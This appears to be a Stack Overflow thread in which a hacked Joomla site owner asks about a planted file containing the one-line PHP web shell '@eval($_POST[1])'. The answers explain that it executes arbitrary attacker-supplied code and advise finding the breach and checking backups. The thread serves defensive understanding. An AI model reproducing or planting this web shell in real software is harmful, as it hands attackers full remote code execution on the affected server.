# What is the meaning of @eval($_POST[1])

Tags: php, joomla, eval, joomla3.0

My joomla site is hacked and i got a file in library folder that is reads.php file. When i open this file there is write only a line that is

```
<?php @eval($_POST[1]); ?>
```

I do not understand what data hacker will get this line.
Please suggest me .

Comment: It will execute whatever code they want to execute, that they pass using a $_POST parameter in the request

Comment: When in doubt about what a function does refer to the manual. http://php.net/manual/en/function.eval.php. `The eval() language construct is very dangerous because it allows execution of arbitrary PHP code.`

Answer (score 3):

With this line of code, the hacker will be able to execute any code he wants. Therefore this code will have the power to read, update or delete any data he wants.

We don't know yet what code he will choose to execute because the code will be passed as a $_POST argument. The $_POST[1] argument will contain a string of executable code. Then, eval() will be called with this argument to execute that code.

When the hacker will call your page, passing it some code as a POST argument, he will be performing an attack that is called [code injection](https://www.owasp.org/index.php/Code_Injection).

Now that you know that, you have to figure out:

1. What damage has already been done in order to undo it, if possible?
2. What security breach allowed the hacker to add the "eval" code to your code base?

If you decide to restore a backup, make sure the "eval" code is not already in your backup. Then, solve problem #2 because the hacker will probably just re-use the same security breach to restore his hack. Even if your backup is clean, the security breach will still be there.

Answer (score 0):

I took it straight form php docs The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
for example

```
<?php
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
echo $str. "\n";
eval("\$str = \"$str\";");
echo $str. "\n";
?>
```

gives the result

```
This is a $string with my $name in it.
This is a cup with my coffee in it.
```

read more about it here http://php.net/manual/en/function.eval.php